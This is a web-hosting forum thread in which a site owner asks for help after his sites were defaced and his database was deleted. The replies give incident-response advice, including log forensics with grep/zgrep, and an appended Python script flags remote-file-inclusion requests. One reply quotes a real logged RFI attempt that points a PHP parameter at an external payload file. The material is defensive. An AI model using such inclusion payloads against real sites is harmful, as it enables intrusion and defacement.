All of my sites hosted at DreamHost were hacked today by Www.AvciHack.Com; they changed my main pages and deleted my database. I changed my FTP password but it is useless. Plus, there is no visible strange file on my server either. Could anyone give me some advice on how to deal with this? Thanks a lot for your help.
Sounds like one of your PHP scripts got exploited. Make sure everything is up to date, otherwise bots are going to exploit your sites time and time again.
Get a security company to check what actually happened and patch it before it is too late (if it is not too late).
What are the names and versions of the scripts you are using? Some might have security vulnerabilities.
PHP exploits have been a pain in the butt for me! Lost a valuable database to them last year. Now I back up every other day. I found WordPress has been an open door for hackers. They always change the config file and the index file.
This is most probably a PHP exploit... I fell foul of a WordPress hack when I was using the auto RSS import script. The script imported a load of trojans, which meant that every visitor to the site got a trojan. Received a complaint from the DC and had to close the account whilst I removed the offending script!
Have a look at the procedure there: http://forums.digitalpoint.com/showthread.php?t=547049
The same is valid for you as well.

1. You really have to FIND the exact "door" of entry = vulnerability. Hence you have to do access_log forensic research, by using grep/zgrep or by visual search of raw log lines, no matter the size of the log.

2. wisdomtool's advice may be good but also may cost you thousands of $ ... if you had that amount you most likely would have invested such an amount in a network/cyber security workshop - those too are in the range of multi k$ for a few days. Since you did NOT, I assume you have NO such $, hence you have to sit down and do all on your own.

Possible = successful = just a matter of time, and by the end you will feel better because you start to understand your own site / scripts.

See also one of my most recent blog articles at http://www.kriyayoga.com/love_blog/post.php/891

You search for unusual log entries like one of today's most recent hacker attempts:

84.246.4.133 - - [24/Nov/2007:08:09:15 +0800] "GET /love_blog/zboard//include/write.php?dir=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 403 1014 "-" "libwww-perl/5.803"

Hence you look, among MANY other things, for requests of existing or NON-existing URLs by automated scripts, and attempts to UPLOAD/inject like in the above example.

You may also look, in a separate run using grep/zgrep in your access_log / error_log files, for the user agent:

zgrep "libwww-perl" access_log-2007*.gz >>libwww-perl.txt

Adapt the above bash line with your own exact access_log file name. This writes the output of grep / zgrep into the file libwww-perl.txt.

This is but one of many ways hackers try to get into your "panty" !! But this is a very frequent way and apparently fully automated, using a variety of known vulnerabilities across the planet. Hence you find such GET requests for files you may never have had - but you also may find some of the SW/scripts you have ...
calum's question is good, but now you have to Google for every "script_name_you_have security alert". Use the above 3 keywords for the G search BUT without quotes !! Then you may find known and published security issues about any of your installed scripts.

You also may run a FULL nessus scan on your server - that only works if you have your OWN server - this again would show you possible KNOWN vulnerabilities on your server/site.

Reformatting/reinstalling IS NO solution - in hours or days all will be as is NOW !! You HAVE to search AND FIND !! No matter the time / efforts involved.

Remember as a criterion of motivation: the hackers did EXACTLY the same on your site - search and find. What "strangers" can do, the owner needs to be able to do even faster, better and more efficiently !!!

Meanwhile you may at least:
- disable any password login
- chmod 000 any and ALL URL-paths into login areas AND upload scripts
- DISABLE any and every upload of ANY kind of file !! txt, jpg, gif or whatever !!!!!!!
It is very unlikely that the host has the time/money and resources to do the site owner's job. Typically:

- the host controls the server - the server is the least danger to get hacked
- the site owner is in charge of all his installed SW = here is the greatest and typically the only danger to get hacked

The host would need to know all your SW/scripts, which is very unlikely. But the host may eventually assist you in giving access to ALL the various log files needed to do all the forensic research needed - as outlined in the posts a.m. - to find your entry point and thus secure your site.
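
The access_log search described in the posts above, as an added example (not code from any poster in this thread): it parses combined-format log lines, flags requests that pass a remote URL as a parameter value like the quoted write.php?dir=http://... attempt, and separates the ones the server answered with 2xx from the blocked ones. The first sample line is the one quoted in the thread; the other lines, the function names and the user-agent pattern are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format, the format of the line quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
REMOTE_VALUE = re.compile(r'^\s*(?:https?|ftp)://', re.I)
SCRIPTED_UA = re.compile(r'libwww-perl', re.I)  # assumption: extend with other tool UAs you see

# First line is the one quoted in the thread; the rest are constructed samples.
SAMPLE = [
    '84.246.4.133 - - [24/Nov/2007:08:09:15 +0800] "GET /love_blog/zboard//include/write.php?dir=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 403 1014 "-" "libwww-perl/5.803"',
    '192.0.2.10 - - [24/Nov/2007:08:11:02 +0800] "GET /blog/inc/view.php?page=http%3A%2F%2Fexample.test%2Fid.txt%3F HTTP/1.1" 200 5120 "-" "libwww-perl/5.803"',
    '198.51.100.7 - - [24/Nov/2007:08:12:40 +0800] "GET /blog/index.php?ref=http://example.test/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Nov/2007:08:12:41 +0800] "GET /blog/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]


def triage(lines):
    """Flag requests whose query string passes a remote URL as a parameter value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; review such lines by hand
        path, _, query = m['target'].partition('?')
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_VALUE.match(value):
                hits.append({'ip': m['ip'], 'status': int(m['status']),
                             'path': path, 'param': name,
                             'scripted_ua': bool(SCRIPTED_UA.search(m['ua']))})
                break
    return hits


def served(hits):
    """Hits answered 2xx (the script ran, unlike a 403), scripted clients first.
    A 2xx does not prove the include worked; it tells you which script to audit."""
    ok = [h for h in hits if 200 <= h['status'] < 300]
    return sorted(ok, key=lambda h: not h['scripted_ua'])


if __name__ == '__main__':
    for h in served(triage(SAMPLE)):
        print(h['status'], h['ip'], h['path'], h['param'], h['scripted_ua'])
```

For rotated .gz logs, open each file with Python's gzip.open(name, 'rt') and pass the file object to triage().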